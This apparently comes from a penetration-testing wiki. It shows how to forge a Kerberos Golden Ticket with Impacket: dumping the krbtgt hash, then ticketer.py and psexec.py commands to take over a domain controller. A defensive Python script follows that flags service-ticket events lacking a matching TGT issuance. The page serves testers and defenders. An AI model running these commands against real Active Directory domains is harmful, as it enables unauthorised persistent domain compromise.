# Forge Golden Ticket

A Golden Ticket attack is one in which an adversary gains control of the Active Directory Key Distribution Center service account (`krbtgt`) and uses that account to forge valid Kerberos tickets. A golden ticket allows you to persist in an environment almost indefinitely.

### Prerequisites for creating a Golden Ticket:

1. The NT hash of the `krbtgt` account. This can be obtained by running `secretsdump.py` against the Domain Controller.
2. Domain SID. This can be obtained by using `lookupsid.py` against the Domain Controller.
3. Domain name. This can be gathered by querying it on the Domain Controller or will have been gathered throughout the penetration test.
4. Username to impersonate. This should be a valid user on the domain.

### Creating a Golden Ticket on Linux with Impacket

1\. Use `ticketer.py` to customize, sign, and save the ticket:

```bash
ticketer.py -nthash [NTHASH] -domain-sid [SID] -domain [DOMAIN] [USER]
```

2\. Export the ticket:

```bash
export KRB5CCNAME=[USER.CCACHE]
```

3\. Authenticate with the created ticket to the domain controller:

```bash
psexec.py [DOMAIN]/[USER]@[HOST] -k -no-pass -dc-ip [DOMAINCONTROLLER]
```
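
From the defender's side, a ticket forged offline as in the steps above is never issued by the KDC, so the domain controller logs a service-ticket request (event 4769) with no matching TGT request (event 4768), or one older than policy allows. The Python below is an added example, not part of the original page or of Impacket. It assumes Security events from every domain controller have already been parsed into the simplified, hypothetical dict fields shown, and that the default 10-hour TGT lifetime applies.

```python
from datetime import datetime, timedelta

# Default AD policy caps TGT lifetime at 10 hours (assumed unchanged in this domain).
MAX_TGT_LIFETIME = timedelta(hours=10)

# Constructed sample events (not real logs); field names are hypothetical, simplified
# stand-ins for the parsed 4768 (TGT request) and 4769 (service ticket request) records.
SAMPLE_EVENTS = [
    {"id": 4768, "time": "2024-05-01T08:00:00", "user": "alice", "ip": "::ffff:10.0.0.21"},
    {"id": 4769, "time": "2024-05-01T08:00:05", "user": "alice@CORP.EXAMPLE", "ip": "::ffff:10.0.0.21"},
    {"id": 4769, "time": "2024-05-01T09:30:00", "user": "administrator@CORP.EXAMPLE", "ip": "::ffff:10.0.0.66"},
    {"id": 4768, "time": "2024-04-30T20:00:00", "user": "bob", "ip": "::ffff:10.0.0.30"},
    {"id": 4769, "time": "2024-05-01T07:30:00", "user": "bob@CORP.EXAMPLE", "ip": "::ffff:10.0.0.30"},
]


def _key(event):
    """Normalise 'user@REALM' and IPv4-mapped addresses so 4768 and 4769 records match."""
    user = event["user"].split("@")[0].lower()
    ip = event["ip"].removeprefix("::ffff:")
    return user, ip


def find_tgs_without_tgt(events, max_lifetime=MAX_TGT_LIFETIME):
    """Return 4769 events with no 4768 for the same user and client within max_lifetime."""
    last_tgt = {}      # (user, ip) -> time the KDC last issued a TGT
    suspicious = []
    # ISO 8601 timestamps in one format sort chronologically as strings.
    for ev in sorted(events, key=lambda e: e["time"]):
        when = datetime.fromisoformat(ev["time"])
        key = _key(ev)
        if ev["id"] == 4768:
            last_tgt[key] = when
        elif ev["id"] == 4769:
            issued = last_tgt.get(key)
            # Never issued by the KDC, or used after the policy lifetime has expired.
            if issued is None or when - issued > max_lifetime:
                suspicious.append(ev)
    return suspicious


if __name__ == "__main__":
    for hit in find_tgs_without_tgt(SAMPLE_EVENTS):
        print(f"{hit['time']}  {hit['user']}  from {hit['ip']}: no valid TGT issuance seen")
```

In production, ticket renewals (event 4770) should also refresh the issuance time, and gaps in log collection will show up as false positives.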

### References

- <https://www.qomplx.com/qomplx-knowledge-golden-ticket-attacks-explained>
- <https://yojimbosecurity.ninja/golden-ticket-with-impacket>

